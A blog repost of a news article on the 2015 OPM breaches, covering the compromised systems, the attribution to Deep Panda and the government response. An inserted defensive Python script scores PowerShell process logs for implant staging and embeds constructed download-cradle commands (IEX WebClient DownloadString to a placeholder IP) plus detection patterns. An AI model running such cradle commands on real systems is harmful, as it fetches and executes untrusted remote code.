Monday 22 June 2015

“EPIC” fail—how OPM hackers tapped the mother lode of espionage data

Government officials have been vague in their testimony about the data breaches—there was apparently more than one—at the Office of Personnel Management. But on Thursday, officials from OPM, the Department of Homeland Security, and the Department of the Interior revealed new information that indicates at least two separate systems were compromised by attackers within OPM’s and Interior’s networks. The first was the Electronic Official Personnel Folder (eOPF) system, an entity hosted for OPM at the Department of the Interior’s shared service data center. The second was the central database behind EPIC, the suite of software used by OPM’s Federal Investigative Service in order to collect data for government employee and contractor background investigations.

OPM has not yet revealed the full extent of the data exposed by the attack, but the agency’s initial response to the breaches indicates that information on as many as 3.2 million federal employees (both current federal employees and retirees) was exposed. However, new estimates in light of this week’s revelations have soared: as many as 14 million people in and outside government may be affected by the breach, including uniformed military and intelligence personnel. It is, essentially, the biggest potential “doxing” in history. And if true, personal details from nearly everyone who works for the government in some capacity may now be in the hands of a foreign government. This fallout is the culmination of years of issues such as reliance on outdated software and contracting large swaths of security work elsewhere (including China).

The OPM breaches themselves are cause for major concern, but there are signs that these are not isolated incidents. “We see supporting evidence that these attacks are related to the group that launched the attack on Anthem [the large health insurer breached earlier this year],” said Tom Parker, chief technology officer of the information security company FusionX. “And there was a breach at United Airlines that’s potentially correlated as well.” When pulled together into an analytical database, the information could essentially become a LinkedIn for spies, providing a foreign intelligence organization with a way to find individuals with the right job titles, the right connections, and traits that might make them more susceptible to recruitment or compromise.

Preliminary evidence points to a group dubbed by Crowdstrike as “Deep Panda,” a Chinese cyber-espionage group. In the past, the group has used Windows PowerShell attacks to implant remote access tools (RATs) on Windows desktops and servers. It is this malware that investigators are believed to have discovered on OPM’s network and in the Department of the Interior’s data center.
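The article only says that the group has used PowerShell-based attacks to stage remote access tools; it does not describe the commands involved. The script below is an added example (not code from the article, from OPM, or from any investigator) of the kind of triage logic a defender would run over process-creation telemetry to surface that class of activity: it parses a constructed, flattened export of Windows event 4688 records, decodes any `-EncodedCommand` payload (powershell.exe expects base64 of UTF-16LE), and scores a handful of well-known staging indicators such as hidden windows, execution-policy bypass and download cradles. The log format, host and user names, the 203.0.113.5 address, the indicator weights and the alert threshold are all assumptions made for the example.

```python
"""Score PowerShell process launches for implant-staging indicators.

Added example; the event format, names, weights and threshold are assumptions,
and the sample events are constructed, not real records from any intrusion.
"""
import base64
import re

# Constructed payload: a download cradle encoded the way powershell.exe's
# -EncodedCommand expects it (base64 over UTF-16LE). Not a real sample.
CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s')"
ENCODED_CRADLE = base64.b64encode(CRADLE_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed sample events in an assumed flat key=value export of event 4688
# (process creation). Hosts, users and the IP address are placeholders.
SAMPLE_EVENTS = [
    "4688 host=ws01 user=jdoe cmd=powershell.exe -NoProfile -Command Get-Process",
    "4688 host=ws02 user=svc_backup cmd=powershell.exe -nop -w hidden -ep bypass -enc " + ENCODED_CRADLE,
    "4688 host=srv07 user=admin cmd=powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')\"",
    "4688 host=ws03 user=jdoe cmd=notepad.exe C:\\Users\\jdoe\\notes.txt",
]

# (name, pattern, weight). The weights are an assumption for this example,
# not a published scoring scheme; tune them against your own baseline.
INDICATORS = [
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("policy-bypass", re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I), 2),
    ("no-profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("encoded-command", re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I), 3),
    ("download-cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I), 3),
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I), 3),
]
ALERT_THRESHOLD = 5

_ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
_EVENT_RE = re.compile(r"^(?P<id>\d+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def parse_event(line):
    """Split one flat 4688 record into its fields; raises on malformed input."""
    m = _EVENT_RE.match(line)
    if not m:
        raise ValueError("unrecognised event line: %r" % line)
    return m.groupdict()


def analyse_command_line(cmdline):
    """Score a command line plus its decoded payload; each indicator counts once."""
    decoded = decode_encoded_command(cmdline)
    hits = {}
    for text in (cmdline, decoded or ""):
        for name, pattern, weight in INDICATORS:
            if pattern.search(text):
                hits[name] = weight
    return {"score": sum(hits.values()), "indicators": sorted(hits), "decoded": decoded}


def triage(events, threshold=ALERT_THRESHOLD):
    """Return alert records for every event whose score reaches the threshold."""
    alerts = []
    for line in events:
        ev = parse_event(line)
        result = analyse_command_line(ev["cmd"])
        if result["score"] >= threshold:
            alerts.append({"host": ev["host"], "user": ev["user"], **result})
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print("%s %s score=%d %s" % (a["host"], a["user"], a["score"], ",".join(a["indicators"])))
        if a["decoded"]:
            print("  decoded:", a["decoded"])
```

Scoring on the union of indicators across the raw command line and the decoded payload means an encoded cradle and a plain-text one land on the same footing; the harmless `-NoProfile Get-Process` launch scores well under the threshold, which is the behaviour to check first when you rebalance the weights against real administrative traffic.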

Handing out bandages

The two systems breached were the Electronic Official Personnel Folder (eOPF) system, an entity hosted for OPM at the Department of the Interior’s shared service data center, and the central database behind “EPIC,” the suite of software used by OPM’s Federal Investigative Service in order to collect data for government employee and contractor background investigations.

Ars contacted both OPM and DHS while researching this story, but officials at both agencies refused to confirm or deny that these systems were part of the breach due to the ongoing investigation. However, sources familiar with OPM projects identified these systems as the ones most likely to be at the heart of the breaches.

In the weeks following the breach discovery, OPM officials scrambled to find a contractor to handle the “Privacy Act event.” The organization issued a call in late May and awarded a contract five days later (on June 2) to Winvale Group, a Washington, DC-based technology services company that also helps businesses sell services to the government. OPM classified the transaction as a blanket purchase agreement to allow for multiple additional purchases. The $20.8 million “first call” was for 3.2 million “units” of credit monitoring and identity theft recovery services, indicating the agency’s early assessment of how many individuals might have been affected by the breach.

The Winvale Group may be getting a lot more business based on OPM Director Katherine Archuleta’s statement to the House Government Oversight Committee this week. “In early May, the interagency incident response team shared with relevant agencies that the exposure of personnel records had occurred,” Archuleta said. “During the course of the ongoing investigation, the interagency incident response team concluded—later in May—that additional systems were likely compromised, also at an earlier date. This separate incident—which also predated deployment of our new security tools and capabilities—remains under investigation by OPM and our interagency partners. In early June, the interagency response team shared with relevant agencies that there was a high degree of confidence that OPM systems related to background investigations of current, former, and prospective Federal government employees, and those for whom a federal background investigation was conducted, may have been compromised.”

To date, OPM has no idea how many individuals’ background investigations were exposed. All Archuleta said was that the agency was “committed to notifying those individuals whose information may have been compromised as soon as practicable.”

In the meantime, the Obama administration has ordered a “30-day Cybersecurity Sprint.” Agencies must perform vulnerability testing and patch existing holes in security. They must prune the number of privileged user accounts and expand adoption of multifactor authentication to all systems. The Department of Defense and Intelligence Community have led the way on that last requirement, but many civilian agencies (such as OPM) have been slow to put it in place.

Just how much this “sprint” will improve government security remains to be seen, especially since agencies such as OPM have been repeatedly warned in the past about minimum “security hygiene.” Thirty days is not likely enough time to correct a decade-plus of neglect of antiquated systems, poor leadership, and spotty attempts at modernization.

View the original content and more from this author here: http://ift.tt/1Cmr9hs



from hacker samurai http://ift.tt/1CnEINS
via IFTTT
